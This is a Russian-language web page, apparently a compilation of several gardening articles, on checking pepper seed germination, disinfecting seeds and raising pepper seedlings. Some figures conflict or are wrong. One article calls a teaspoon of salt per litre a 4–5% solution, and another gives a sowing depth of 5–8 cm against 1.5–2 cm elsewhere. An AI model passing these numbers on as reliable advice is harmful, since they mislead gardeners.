6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Проверка всхожести семян перца

Проверка всхожести семян перца

Высаженные семена не всегда радуют хорошими всходами, не всегда можно получить желаемого количества рассады. Проверка всхожести семян перца – один из этапов подготовки посевного материала. Эта процедура поможет отбраковать некачественные зерна.

Проверка всхожести семян перца

Что такое всхожесть

Семена характеризуются способностью прорастать за некоторое время, если им обеспечены соответственные условия. Процентное соотношение посаженых зерен к тем, что проросли, называется всхожестью. Она не может быть стопроцентной, тем более что перец – капризная культура.

Различают лабораторную и полевую всхожесть. Показатели первой пишут на упаковках, и они всегда высокие – 95-98%. Это объясняется тем, что в лабораториях созданы идеальные условия для проращивания семени, которые обеспечить дома невозможно. Поэтому при таком микроклимате показатели всегда ниже.

Семена сладкого перца сохраняют всхожесть 3-4 года. Лучше сажать их в первый год после сбора, так как с каждым годом количество зерен, что могут прорасти, уменьшается. Поэтому при покупке посевного материала надо обращать внимание на дату выпуска. Не стоит покупать его на рынке, из рук. Лучше отдать предпочтение известной фирме-производителю с хорошей репутацией.

В продажу поступают семена со всхожестью от 60%. Для посевного материала 1-го класса показатели должны превышать 80%. Надо также учесть, что разные сорта показывают разные сроки прорастания. Поэтому следует ознакомиться с характеристиками желаемого для высадки вида.

Подготовка семян для проверки на всхожесть

Сначала надо отобрать качественный посевной материал. Производят калибровку. Оставляют только большие и средние зернышки. Они содержат больший запас питательных веществ, поэтому дадут крепкие и здоровые растения. Приблизительно одинаковые по размеру семена обеспечат дружные всходы. Это облегчит уход за сеянцами.

Зерна, помешивая, помещают на 2 часа в такой раствор:

  • 30-50 г поваренной соли;
  • 1 л воды.

Полновесные семена опустятся на дно. Пустотелые и маленькие – всплывут. Их удаляют, такие зерна не сажают или проращивают отдельно. Остальные извлекают, промывают чистой водой и просушивают.

Проверка всхожести семян перца

Процедуру совершают заранее. Не стоит ждать, когда подойдут сроки посадки. Тогда не хватит времени для замены посевного материала, если он окажется некачественным. Заодно проверяют энергию прорастания – насколько равномерно появляются ростки.

Чтобы проверить семена перца на всхожесть, их берут по 10 или 20 штук. Так будет легче рассчитать процентное соотношение посеянных и проросших зерен. Дальше равномерно укладывают на сложенный в несколько слоев бинт (марлю, туалетную или фильтровальную бумаги), увлажняют. Сверху укрывают тем же способом. Помещают в пластиковый сосуд с крышкой, которую потом регулярно открывают для проветривания. Можно оставить на блюдце, но так труднее будет следить, чтобы ткань не пересыхала. Для увлажнения хорошо подойдет талая вода. Ее надо периодически доливать, но понемногу.

Емкость оставляют в тепле (25˚С). Через несколько дней, когда проклюнутся зерна, подсчитывают их количество. Определяют процент всхожести. Если ее показатели невысокие, нужно сажать больше зерен. Когда они ниже 30%, такой посевной материал не используют. Средний процент всхожести семян болгарского перца составляет 65-85%.

Факторы влияния на всхожесть

Неправильное хранение может испортить семена

Количество проросших зерен может снижаться по разным причинам:

  • не обеспечены соответствующие условия – полив, температура окружающей среды и т.д.;
  • неправильное хранение – не стоит держать зерна в помещении с высокой влажностью, она повышает температуру внутри посевного материала, он может стать стерильным;
  • незрелость и пересушенность;
  • отсутствие стадии покоя.

Чтобы зерна хорошо проросли, посевам нужно обеспечить оптимальные условия:

  1. Температура. Показатели воздуха – 25-28˚С, земли – 20-25˚С. Под ящик укладывают доску, чтобы не допустить переохлаждение земли.
  2. Почва должна быть воздухо- и водопроницаемая.
  3. Полив частый, но умеренный. Качественный посевной материал гибнет от избытка влаги, так как грунт плохо пропускает к нему кислород.
  4. Проветривание помещения.

Повышение всхожести

С этой целью в промышленных масштабах производят барботирование, дражирование, инкрустирование. Дома совершают подготовительную обработку семян.

Обеззараживание

Чтобы зерна не потеряли посевные качества, процедуру проводят за 2 дня до высадки. Для этого их помещают в марлевый мешочек и на 20 минут замачивают в 20% соляном растворе или 1-2% растворе марганцовки. Потом извлекают, промывают и просушивают. Используют еще покупные средства. Побороть болезнетворные бактерии поможет препарат Фитоспорин-М. Его в количестве 4 капель разводят в 1 стакане воды.

Насыщение полезными веществами

Качества посевного материала улучшают с помощью стимуляторов роста. С этой целью используют органические и химические средства. Отлично подойдет зольная вода (20 г пепла на 1 стакан воды, настаивают 1 день), в которой замачивают зерна на 5 часов. Также используют препараты Эпин, Циркон, Ивин и др.

Надо тщательно следить за временем произведения процедур, а также концентрацией используемых растворов. Ее повышение грозит обратным эффектом – всхожесть снизится.

Рассада перца: что действительно необходимо делать, а без чего можно обойтись

Сладкий перец выращивают на своих огородах далеко не все дачники, поскольку это не самая простая по агротехнике культура. Перец теплолюбив, имеет длительный вегетационный период. Вырастить его без стадии рассады можно очень редко: почти во всех регионах заботы о перце начинаются ещё зимой, а в марте семена высевают на рассаду.

Как выбрать семена и что с ними сделать в первую очередь

Уже к февралю у дачника должны быть готовы тара, грунт и семена для выращивания рассады перца. Многие опытные овощеводы из года в год пользуются своими семенами понравившихся им сортов, собирая их со спелых плодов в конце лета. Однако так можно поступать только в случае сортовых перцев: как бы ни были хороши гибриды первого поколения (обозначаемые как F1), брать от них семена бессмысленно: вырасти из таких семян может что угодно, таковы уж законы генетики.

Семена у перца крупные, работать с ними легко

В то же время многие современные гибриды настолько хороши как по урожайности, так и по устойчивости к неблагоприятным условиям, что всё больше огородников перестаёт экономить на семенах и покупает в магазине гибридные. Правда, в этом случае не стоит покупать семена от неизвестных фирм, хотя они и могут быть дешевле. В большинстве случаев семена гибридов выпускают уже готовыми к посеву, их подготовка силами дачника сводится к минимуму. Со своими семенами надо повозиться немного больше.

Впрочем, не всегда семена неизвестного происхождения не стоит использовать для посева, но тут уж — как повезёт! Пару раз на страх и риск высевал семена из купленных зимой в «Магните» понравившихся плодов, и результат был весьма неплохой.

Перед тем как начать что-либо делать с семенами, следует проверить их годность для посева. Семена перца сохраняют всхожесть в течение нескольких лет (при правильном хранении — до пяти), и дате, указанной на упаковке, обычно можно доверять. Свои же семена ещё зимой стоит проверить на всхожесть стандартным способом. Десяток семян (можно и меньше) складывают в тряпочку, хорошо смачивают её водой и помещают в любой неплотно закрытой ёмкости (удобнее всего — в чашке Петри) в тёплое место (например, около батареи), чтобы температура была не ниже 25 о С. Следят за тем, чтобы тряпочка не пересыхала, и проверяют состояние семян. Если через неделю большинство из них проклюнулись, семена можно использовать для посева.

Проращивание семян и проверку всхожести удобно проводить и на губке

Обработка и проращивание семян перед посадкой

Хорошие семена перца можно высевать на рассаду «как есть», прямо сухими. Сам я уже много лет только так и поступаю, поскольку опыт показывает, что большинство из описываемых в многочисленных статьях процедур лишь зря отнимают время, которого и так очень мало. Впрочем, навязывать своё мнение — не лучший подход, тем более что для семян сомнительного качества действительно желательны некие действия перед их посевом.

Из всех предлагаемых операций существенное значение в ряде случаев могут иметь:

Выполнять следует только то, что действительно покажется необходимым.

Калибровка

Когда это делать? Уже перед посевом, когда приготовлено всё, что для этого требуется. Семена у перца довольно крупные, и отобрать щуплые экземпляры можно даже вручную, с помощью пинцета. Их лучше не сажать. Хорошие производители даже не кладут в пакетики негодные семена. Ещё проще провести калибровку по плотности. Для этого почти все источники советуют использовать солёную воду (примерно ложку соли на литр воды), но можно прекрасно обойтись и чистой водой: плотность у неё ненамного ниже, чем у раствора поваренной соли. Семена, не утонувшие в течение 5–7 минут (при периодическом помешивании) лучше выбросить. Скорее всего, они тоже взойдут, но растения будут слабыми.

Обеззараживание

Обеззараживание необходимо в случае семян от своего урожая. Проводят его просто: семена высыпают в тёмный раствор марганцовки и держат его там 20–30 минут. Совет приготовить 1%-й раствор хорош, но как в большинстве случаев хозяин будет брать навеску препарата в 1 г или менее? Всё здесь очень приблизительно, но пользоваться светло-розовым раствором бессмысленно. Важно после обеззараживания как следует отмыть семена чистой водой. Кстати, зачем их перед этим калибровать? Тоже лишняя операция: негодные семена не утонут и в растворе марганцовки.

Раствор марганцовки такой концентрации брать для дезинфекции семян бесполезно: надо приготовить очень тёмный раствор

Вместо марганцовки можно пользоваться 3%-м раствором перекиси водорода, но его используют тёплым: при температуре около 35 о С, держат семена в таком растворе 10–15 минут. Другие, более экзотические, препараты специально для этой цели покупать ни к чему.

Закаливание

Если выращивание перца предполагается в теплице, то закаливание семян — излишняя мера. Если же в открытом грунте — полезная, хотя и не все специалисты по овощеводству горячо поддерживают это. Но, по крайней мере, не навредит. Чтобы закаливание имело смысл, надо дождаться, пока семена набухнут. Для этого их держат во влажной тряпочке и периодически проверяют: как только самые первые проклюнутся, все семена отправляют в холодильник.

Есть разные режимы закаливания. Пожалуй, оптимальный состоит в чередовании температур: 12 часов в холодильнике, 12 часов при комнатной температуре, после чего ещё два раза таким же образом. После этого можно проводить посев.

Другие процедуры

Можно встретить множество советов по дополнительной обработке семян перца. Всё это из серии «когда слишком много свободного времени». Ещё раз можно повториться: качественные семена взойдут и дадут крепкую рассаду вообще без обработки. Хотя замочить их и не очень сложно, но даст эта операция выигрыш в сроках появления всходов на 1–2 дня, и больше ничего. Прогревание у батареи, столь важное в случае семян многих сортов огурцов (увеличивает количество женских цветков) в случае перца абсолютно бессмысленно.

Из этой же области и совет использовать барботирование — продувание воздухом от компрессора воды, в которую пускают плавать семена. Эта мера существенно ускоряет появление всходов моркови, петрушки, сельдерея — культур, семена которых покрыты плотной эфирной оболочкой. Замачивание с продуванием позволяет разрушить её и вдвое ускорить прорастание семян. К перцу это не относится! И не стоит искать источник ультразвука, ведь и про это тоже можно иногда прочитать.

Некоторые прилежные огородники замачивают семена перца в препаратах, ускоряющих всхожесть и усиливающих иммунитет растений, например, в Эпине. Польза от этого, конечно, есть, но велика ли? Если очень хочется, проще и дешевле воспользоваться соком столетника (алоэ). Он действительно полезен, повышает адаптационные способности растений, защищает от инфекций. Но подготовить препарат надо правильно. Для этого алоэ держат неделю в темноте при низких положительных температурах, лишь затем отжимают сок из листьев. Сок смешивают пополам с водой и выдерживают в нём семена в течение суток.

Алоэ — прекрасный природный иммуномодулятор, но использовать его надо правильно

Посадка семян перца

Подготовленные семена высаживают на рассаду в комнатных условиях. В отличие, например, от капусты, которой требуется невысокая температура, для рассады перца в большинстве городских квартир условия вполне комфортные.

В какие сроки проводят посев

Даже в Болгарии перец выращивают в основном через рассаду, но это — чтобы раньше получить урожай. У нас без рассады обойтись трудно, но в сроках посева семян у специалистов появились разногласия.

Если совсем недавно считалось, что сеять надо во второй половине февраля, самое позднее — до 8 марта, то теперь господствует точка зрения, что спешить не надо. Большинство огородников переходит на посев семян в середине марта, чем уменьшает себе головную боль, связанную с недостатком света и тепла в феврале.

Для тепличного получения урожая закончить с посевом нужно в первой половине марта, иначе не будет никакого выигрыша во времени от теплицы, проще в мае купить рассаду. Для открытого грунта в средней полосе семена в стаканчики можно посеять вплоть до конца марта: ведь в грядку рассаду переносят только в начале лета. Если есть возможность посадить рассаду в мае (под временное укрытие), посев проводят раньше. Ориентир простой: посев — примерно за 2,5 месяца до высадки рассады. Это правило работает во всех климатических регионах.

Подходящая почва

Для выращивания десятка растений проще купить грунт для перца в магазине. При самостоятельном его приготовлении надо получить воздухо- и водопроницаемую смесь с большой концентрацией питательных элементов и нейтральной кислотностью. Для этого можно взять компост, речной песок и дерновую землю в соотношении 2:1:1 и добавить немного золы. Готовую смесь обязательно проливают розовым раствором марганцовки за день до посева семян.

Вместо перегноя подойдёт компост, вместо дерновой земли — любая плодородная, но не из грядки с паслёновыми культурами.

Перец не любит пикировку, поэтому обычно семена сеют сразу в индивидуальные стаканчики вместимостью от 300 мл. Впрочем, предварительный посев в общую коробку возможен, но рассаживают сеянцы в стаканчики (в фазе 2–3 настоящих листочков) аккуратно, с комом земли, не нарушая корней.

Торфяные горшочки — лучшая тара для рассады перца

Глубина заделывания семян

В каждый стаканчик кладут дренажный слой (1 см крупного песка), потом насыпают приготовленный грунт. Высевают семена на глубину 1,5–2 см. Если они уже проклюнулись, то по одному; сухие семена, если нет дефицита, лучше по два: потом лишние растения удаляют. Почву хорошо поливают тёплой водой и накрывают стаканчики стеклом или плёнкой. Ежедневно убирают со стекла конденсат и слегка проветривают содержимое стаканчиков.

Условия прорастания

Перец взойдёт при любой температуре выше 20 о С, но это может занять много времени. Оптимальна температура 24…28 о С. Свет при этом не обязателен, но дело в том, что сразу после появления «петелек» он нужен, и интенсивный. Если есть опасность прозевать всходы, лучше срезу поставить стаканчики в тепло и на свет.

Через сколько дней появляются всходы

При указанной температуре даже сухие семена большинства сортов прорастают через 7–10 дней, а всходов от пророщенных можно ожидать уже на четвёртые сутки. Важно не дожидаться появления всех всходов: после появления первых же росточков весь поддон со стаканчиками переносят в хорошо освещённое место с температурой 18–20 о С (ночью на 3–4 градуса ниже) и держат так дней пять.

Первая же «петелька» — сигнал к понижению температуры

Уход за всходами

Если в течение первых 5–6 дней не было слишком жарко и темно, сеянцы не вытянулись, дальше всё просто: рассаде нужен самый обычный уход. Пересадка проводится только в случае предварительного посева семян в общую коробку или если были взяты маленькие стаканчики и рассада перерастает, а в грядку сажать её ещё не позволяет погода.

Полив и подкормка

Рассаду перца поливают водой с температурой около 25 о С. Поливы проводят нечасто, 1–2 раза в неделю (в зависимости от условий), не допуская пересыхания грунта в стаканчиках. При поливах важно не замачивать листья, лить воду из маленького чайничка под корень. Время от времени в воду добавляют немного марганцовки (до светло-розового окрашивания).

Часто можно обойтись и без подкормок, но принято пару раз рассаду подкормить. Можно ограничиться настоем древесной золы. Первый раз подкормку вносят при образовании 4-го листка, второй — за 10–15 дней до высадки рассады в грядку. До подкормки и после неё необходим полив чистой водой.

Соблюдение температурного и светового режима

Всё время, кроме первой недели, надо стараться поддерживать температуру 23–26 о С днём и 18–20 о С — ночью. Если подоконник не направлен на север, заботиться о подсветке в марте-мае не надо. На северном подоконнике стоит оборудовать фитолампы, поскольку света от солнца рассаде может не хватать. Продлевать световой день не надо, речь может идти только об интенсивности света.

Подсветка нужна только в случае явного полумрака

Важно не забыть о закаливании рассады. За неделю до высадки в грядку её приучают к свежему воздуху, вынося ненадолго на балкон (сначала на 10–15 минут, затем до 3–4 часов). В это время не стоит и сильно поливать рассаду, чтобы она привыкала к трудностям. Высадка в грядку без укрытия возможна с наступлением настоящей летней погоды: почва должна прогреться до 14 о С, ночные температуры воздуха должны держаться как минимум на таком же уровне. На широте Москвы высадка в грунт раньше начала июня опасна.

Видео: способы посева семян перца на рассаду

Проблемы

Огородники со стажем не считают выращивание перечной рассады большой проблемой, у начинающих могут быть неприятности.

Семена не всходят

Если при оптимальной температуре семена не взошли и через 2 недели, надо скорее повторять посев: что-то пошло не так. Этого не может случиться при хороших семенах и правильном грунте. Поэтому для повторного посева надо проверить и то, и другое.

Сеянцы не растут

Сеянцы могут прекратить рост, если им холодно. Если проблема не в температуре, будет заметно что-то ещё. Так, при недостатке влаги листья будут увядать, при недостатке питания — менять окраску. Чаще всего проблема устранима, если дело не зашло слишком далеко. Надо срочно поправить условия: полить, подогреть, подкормить.

Сеянцы желтеют

Пожелтение листьев — сигнал плохой, но причин может быть много. Такое случается и при недостатке влаги, и при её избытке, при недостатке света или азота. Желтеют листья и от некачественного грунта (слишком тяжёлого или, наоборот, песчаного). При недостатке микроэлементов (марганца, цинка, железа) пожелтение начинается с макушки. Вредители редко забираются в квартиру, если только не были занесены с почвой. Это же касается и болезней. Поэтому причину пожелтения листьев надо искать в промахах хозяина и пытаться её устранить.

Вырастить рассаду перца не очень сложно, но есть нюансы. Они связаны как с правильной подготовкой семян и грунта к посеву, так и с последующим соблюдением всех условий выращивания. Начинающий огородник может где-то ошибиться, но с опытом выращивание рассады перестаёт быть сложным делом.

Всхожесть семян: условия и сроки. Как проверить семена перца на всхожесть

С наступлением первых весенних дней любители-огородники начинают задумываться о своем новом урожае. И не просто задумываться, они уже начинают действовать. Ведь в данном вопросе главное — не упустить момент.

На первых этапах начинают заботиться о подготовке рассады. При этом многие задаются вопросом: а как улучшить всхожесть семян? Далеко не всем известны способы, которые помогут добиться этого. Но чтобы дать ответ на данный вопрос, нужно сначала понять, что же такое всхожесть.

Понятие всхожести

Под всхожестью семян понимают их способность к прорастанию и обеспечению будущего урожая. По сути, ее можно сравнить со здоровьем. Данное понятие подразумевает общее состояние каждой семечки, ее целостность и неповрежденность, силу и время, необходимое на прорастание.

Всхожесть семян принято выражать в процентном соотношении. Его рассчитывают как отношение количества проросших семян к общему количеству. Не стоит ожидать, что всхожесть окажется равной 100 %. Всходы никогда не дают такого результата. Всегда остается до 10 % семян, которые не прорастают. Такой показатель считается очень хорошим.

Факторы, влияющие на всхожесть

Процент всхожести семян зависит от некоторых факторов. Среди них можно выделить следующие:

  • Возраст семян. Эти два понятия находятся в обратной зависимости. Чем больше возраст семян, тем ниже будет всхожесть. Поэтому семена, которые пролежали уже некоторое время, проверять необходимо особенно тщательно.
  • Срок годности. Различные культуры имеют неодинаковый срок годности. У одних он не превышает года, у других может достигать 5 лет. Меньше всего хранятся семена зелени (петрушки, сельдерея, укропа и так далее). А вот семена помидоров, огурцов показывают неплохую всхожесть даже спустя 4-5 лет.
  • Норма всхожести культуры. У растений разных видов отличается и установленная норма всхожести. К примеру, семена зерновых культур, бобовых, репы показывают норму всхожести 90-95 %. Вместе с тем среднее положение по всхожести (60-70 %) характерно для свеклы, капусты, помидоров. Очень низкий процент прорастания — у семян укропа, петрушки. Он составляет 35-55 %.
  • Условия хранения. Всхожесть семян будет выше, если они правильно хранятся. Делать это нужно в сухом помещении, где температура находится в пределах 10 градусов (не выше комнатной). Хранить рекомендуется семена в полотняных мешочках.

Кроме описанных выше условий было замечено, что собранные лично семена хранятся лучше покупных. И соответственно, лучше прорастают. При этом можно быть уверенным в возрасте семян, их сорте и сохранности.

Как необходимо проверять семена?

Проверять всхожесть семян овощей можно уже с февраля. В это время обычно проверяют семена овощей. Что касается цветов, то их проверка может длиться до конца весны. Это будет зависеть от времени посадки культуры.

Подготовка семян является первым этапом на пути к получению хорошего урожая. И провести этот этап необходимо в соответствии с правилами:

  • На упаковке всегда указывается лабораторная всхожесть. Это значение характеризует прорастание семян при идеальных условиях. Но в реальной жизни данное значение недостижимо. Чтобы получить значение, соответствующее полевым условиям, необходимо отнять до 15 единиц.
  • Проверьте дату фасовки, которая также указана на упаковке. Если семена хранились в кульке с фольгой, то срок годности можно немного продлить.

  • Внимательно посмотрите на шифровку, которая имеется на упаковке. Пометка «F1» означает, что семена отличаются повышенной урожайностью, устойчивостью. Обозначение в виде буквы «Б» говорит о том, что семена подверглись обработке кислородом с целью повышения процента всхожести.

Данные советы помогут приобрести семена с лучшими показателями.

Проверка всхожести в домашних условиях

Данный этап подготовки к посадке рассмотрим на примере. Посмотрим, как проверить семена перца на всхожесть. Для начала необходимо провести их калибровку. Семена в упаковке не будут одинаковыми. Из них выбирают наиболее крупные, тяжелые. Пустые, поврежденные, с пятнышками можно выбросить.

Далее необходимо приготовить солевой раствор с концентрацией 4-5 %. Для этого чайную ложку соли разбавляют в 1 литре воды. В этот раствор опускаются выбранные семена перца и оставляют там примерно на 2 часа. За это время плохие семена всплывут, а пригодные к использованию осядут на дно. Те, что всплыли, можно выбрасывать. Остальные промывают от соли и высушивают.

Более точную картину можно узнать другим путем. Для этого необходимо намочить кусочек марли и сложить его пополам. Между слоями уложить семена. Много семян не нужно, достаточно будет только штучек 10. Оставьте их на срок до двух недель. Главное — следить, чтобы ткань не пересыхала. В конце срока посчитайте процент всхожести. Хороший результат – 80 %. При значении меньше 30 % семена использовать нет смысла.

Рассмотрев пример, как проверить семена перца на всхожесть, можно приступать к действиям. На основе примера можно проверить семена и других культур.

Условия всхожести семян

На прорастание семян оказывают влияние следующие факторы:

  • Температура. Чем выше данный показатель, тем быстрее взойдут семена. Связано это с большим потреблением влаги.
  • Количество воды. Количество требуемой влаги зависит от культуры. Больше всего в воде нуждается сахарная свекла, бобовые, семена льна.
  • Кислород. Во время всходов питание семян усиливается.
  • Свет. Данный показатель влияет далеко не на все растения. Существуют культуры, которые не растут на солнце. Для роста других свет солнечных лучей обязателен.

Правильный выбор условия поможет получить готовую рассаду в установленные сроки всхожести семян.

Когда ожидать всходы?

Появление первых всходов – волнительный процесс. Его ждут несколько дней, а иногда и недель. Время ожидания будет зависеть от условий посадки. Сроки всхожести семян различных культур можно увидеть в таблице ниже.

Как видно, семена отдельных растений способны прорастать уже через несколько дней. Быстрее всего прорастают капуста, редиска, редька, томат. Им необходимо всего от 4 до 7 дней при посадке вне помещения и от 3 до 6 дней при выращивании в закрытом грунте. Дольше всего придется ждать появления моркови, репчатого лука, сельдерея.

Обработка, ускоряющая всхожесть

Опытные огородники знают, что существует несколько способов ускорить всхожесть семян. Заключаются они в выполнении нескольких простых процедур:

  • Намачивание. В блюдце укладывается салфетка, смоченная водой. На нее укладываются тонким слоем семена. Сверху все закрывается вторым слоем смоченной ткани. Вода должна быть комнатной температуры. Спустя некоторое время семена напитают влагу, проступят корешки. При пересадке в почву важно не обломать росточки, которые очень хрупкие. Данный способ прекрасно подходит для семян баклажанов, фасоли, гороха, бобов, огурцов, томатов и так далее.
  • Прогревание. Данный метод не только ускоряет всхожесть, но и обеззараживает. Семена прогревают при температуре 60 градусов в духовых шкафах или сушилках. Используют для выращивания помидоров, огурцов.
  • Барботирование. Помещенные в тканевый мешочек семена опускают в воду. Туда же помещают компрессор от аквариума с целью насыщения воды кислородом. Семена при таком способе прорастают уже через день-два. Подходит метод для моркови, лука, петрушки, укропа.

Другие важные моменты

Условия проращивания для всех культур разная. Чаще всего семена всходят в теплом помещении с температурой 22-28 градусов. Но есть и холодолюбивые растения, которые прорастают при 18 градусах (салат, капуста).

Еще один фактор, оказывающий влияние на всхожесть, – качество почвы. Уже готовый грунт можно приобрести в магазине. В таком случае его не нужно удобрять.

Влияет также глубина посева. Мелкие семена сеются по поверхности почвы и прижимаются. С увеличением размера семян увеличивается и глубина. К примеру, сельдерей высевают на глубину 0,5 см, лук – 1 см, огурцы и арбузы – 1,5-2 см.

Необязательно применять все эти способы. Но часть из них обязательна. Их выполнение обеспечит высокий процент всхожести и дружные всходы.

Как обеспечить правильный уход за рассадой перца после всходов семян

Болгарский и острый перец – прихотливые растения, требующие правильного ухода на любом этапе развития растения. Еще перед посадкой следует грамотно подготовить семена, так как от этого зависит их всхожесть и здоровье будущих ростков. Не менее важно точно подготовить грунт для посева, соблюдать сроки высаживания. Срок появления первых всходов рассады зависит от многих факторов – особенности сорта, климатические условия, качество посадочного материала. Чтобы ускорить этот процесс, следует соблюдать алгоритм заделки, выбрать и обработать посадочный материал.

Сроки всхожести семян – как быстро после высадки дома на подоконнике

Сроки и качество прорастания посадочного материала в первую очередь зависят от сорта перца. Для большинства культурных разновидностей (их выращивают для получения плодов) этот период составляет 6-15 дней с момента проведения посева. Про лучшие сорта семян болгарского перца узнайте здесь.

Чем качественнее, свежее и устойчивее семена, тем быстрее они всходят и формируют здоровое растение. Есть несколько методов, как укорить данный процесс – предпосевная обработка, применение стимуляторов, выбор сбалансированного субстрата. Для формирования крепкой, дружной и здоровой рассады требуется правильного подготовить семена, последовательно соблюдать алгоритм посадки. Про выращивание рассады перца сладкого из семян в домашних условиях читайте в этом материале.

Сроки созревания, указанные на упаковке с семенами, определяются по результатам лабораторных и полевых экспериментов. Конкретный период может отличаться из-за хранения и транспортировки, в зависимости от климата в регионе.

От чего зависит скорость прорастания

Качество и скорость появления всходов перца зависит от множества внешних факторов. Наиболее важные из них:

  1. Температура воздуха. Перец – теплолюбивая культура, прорастание семян происходит при температуре от 18 до 30 o C. Чем выше значение, тем быстрее появятся ростки.
  2. Температура и качество грунта. Для комфортного развития всходов земля должна быть прогрета минимум на 18 o C. Для выращивания рассады следует брать только питательный, легкий и плодородный субстрат. Лучше всего воспользоваться готовыми магазинными смесями.
  3. Освещение. Для формирования рассады требуется хорошее освещение. Световой день должен быть не менее 8 часов, зимой рекомендуется использовать лампу для подсветки.
  4. Влажность. После посева емкости с семенами укрывают пленкой для сохранения и повышения влажности. Земля должна быть постоянно увлажненной, что требуется для размягчения оболочки, насыщения семядолей.
  5. Глубина заделки. Чтобы добиться быстрого появления всходов, семена перца нужно заделывать на глубину от 5 до 8 см. Если выложить материал на поверхность, не сформируются корни, при более глубокой посадке есть риск загнивания.

На скорость прорастания влияют плотность грунта, качество посадочного материал, предпосевная обработка. Если ростки не появляются более 2 недель, следует нормализовать микроклимат в помещении или теплице.

Если вы проращиваете семена в парнике или теплице, еще перед началом работы рекомендуется обновить верхний слой грунта. Это усилит плодородность земли и снизит риск заражения болезнями, вредителями.

Через сколько всходят семена сладкого болгарского перца на рассаду, на какой день

Все сорта и гибридные формы сладкого перца всходят в течение 7-15 дней с момента посадки. Конкретный период всегда указывают на упаковке с посадочным материалом. Если вы выращиваете рассаду дома для последующей пикировки в открытый грунт, посев рекомендуется проводить в первую неделю февраля. Ко второй половине мая все сеянцы будут готовы к пересадке на постоянное место.

Через какое время и при какой температуре взойдут семена острого – максимальный срок

Культурные разновидности острого перца всходят так же, как и сорта сладкого (болгарского) – 7-15 суток с заделки в грунт при температуре 18-25 o C. Именно данную форму культуры используют в качестве декоративного растения для выращивания в доме. Такие разновидности перца имеют увеличенный срок прорастания, всходы формируются менее дружно, медленно развиваются. Их сеянцы могут формироваться более 2 недель, обязательно контролировать микроклимат в помещении, следить за состоянием грунта.

Какие семена перца лучше всходят – свежие или старые

Всхожесть семян перца сохраняется до 3 лет при правильном сборе, хранении и транспортировки. С каждым годом качество материала уменьшается, поэтому для выращивания рассады (особенно редких сортов) не рекомендуется использовать старые экземпляры.

При возможности рекомендуется использовать свои семена, полученные после сбора урожая. Их нужно осторожно извлечь из перца, затем просушить и убрать в темное место для последующего хранения. Емкость должна проветриваться, лучше использовать пластиковый контейнер или пакет с проделанными отверстиями.

При выборе семян в магазине следует обращать внимание не только на сроки годности, но и состояние упаковки. На ней не должно быть признаков вскрытия, механических повреждений.

Как проверить и правильно определить всхожесть в домашних условиях

Перед началом посева семена следует откалибровать – выбрать наиболее крупные и внешне здоровые экземпляры. На оболочке не должно быть трещин, признаков гниения и пятен.

После визуального осмотра можно приступать к проверке на всхожесть. Самый эффективный метод – предварительное проращивание. Для этого семена помещают на блюдце между двумя слоями бумажных салфеток или влажных дисков. Емкость накрывают пленкой, затем убирают в теплое и темное место. Следует регулярно проверять уровень влажности, не допускается застоя воды – это приводит к гниению семядолей. Ростки в норме должны появиться в течение 4-5 дней, для поздних и декоративных сортов перца процесс может занять до 2 недель. Про посадку перца на рассаду в улитку расскажет эта статья.

Соленой воде

Пустотелые семена не могут взойти, так как внутри нет достаточного количества питательных веществ. Чтобы проверить посадочный материал, можно использовать солевой раствор. Для этого нужно в 200 мл воды добавить 1 ст. л. обычной поваренной соли, затем погрузить туда семена. Здоровые и качественные экземпляры должны быстро опуститься на дно, а пустые остаются на поверхности. Для ускорения процесса жидкость можно слегка помешивать палочкой. После проверки здоровые семена промыть проточной водой.

Плохая всхожесть или семена вовсе не взошли – что делать

При использовании некачественного или старого посадочного материала можно остаться без рассады перца или получить растения с низкой урожайностью. Есть несколько методов, как усилить всхожесть семян. Для этого используют различные стимуляторы, домашние методы.

Как ускорить и улучшить процесс перед тем, как посадить

Самый надежный и эффективный метод усиления всхожести семян перца – предпосевная обработка стимуляторами роста. Для этой цели используют готовые препараты, например, Эпин-экстра, Корневин, Циркон, гумат натрия. Посадочный материал погружают в предварительно подготовленный раствор на срок, написанный в инструкции. Средняя продолжительность процедуры – 8 часов.

На стадии рассады увеличивается риск заражения болезнями и вредителями. Чтобы избежать гибели молодых растений, семена следует обеззараживать перед посевом. Для этого применяют раствор марганцовки, медицинский спирт или ошпаривание кипятком.

Грунт для выращивания рассады перед посадкой нужно прогреть в духовке, обильно полить марганцовкой или использовать готовые препараты для профилактики заражения.

Перекисью водорода

Для домашней обработки семян применяют 3% раствор перекиси водорода. Препарат активно уничтожает возбудителей болезней, улучшает всхожесть перца. Этот метод увеличивает иммунитет сеянцев, они формируются более крепкими и реже заражаются болезнями. Оптимальное время замачивания – 20 минут, после процедуры посадочный материал следует промыть чистой водой.

Сколько лет сохраняется всхожесть семян – срок годности

При соблюдении всех правил хранения семена сладкого и острого перца сохраняют всхожесть до 3 лет. Посадочный материал нужно держать в закрытой и дышащей таре, избегать температурного, химического или механического воздействия. Повышенная влажность и прямые солнечные лучи ухудшают способность к прорастанию, поэтому место для хранения должно быть сухим, темным.

Что делать с рассадой перца после всходов – как ухаживать

Правильный уход за сеянцами в первые два месяца требуются для формирования здоровых, крепких и урожайных растений. Ростки имеют слабый иммунитет, все силы уходят на развития листьев, корневой системы. Требуется качественный полив, применение удобрений для стимуляции роста. Как пересадить рассаду перца в горшок читайте тут.

Подкормка – как подкармливать пророщенные семена

Вне зависимости от состава и качества грунта первую подкормку рекомендуется проводить через неделю после появления ростов. Лучше всего использовать готовые сбалансированные составы, содержащие все необходимые макро- и микроэлементы. Если вы используете односоставные подкормки, предпочтение стоит отдать азотно-калийным смесям. Из народных методов наибольшей эффективностью обладает зольный раствор, водный настой коровяка, разбавленный в пропорции 1:12.

Как поливать, в какой период необходимо увеличивать полив после посева

Грунт для рассады должен быть постоянно влажным, нельзя допускать застоя воды. Полив должен быть регулярным и стабильным. Лучше всего использовать пульверизатор, чтобы избежать размывания грунта в прикорневой части. Оптимальная частота процедур – 2-3 раза в неделю.

Чтобы сохранить необходимую влажность субстрата во время поездки, воду нужно наливать в подставку емкости. Рядом с рассадой можно дополнительно оставить чашу с жидкостью, влажную гальку, керамзит.

Ошибки садоводов-новичков по уходу

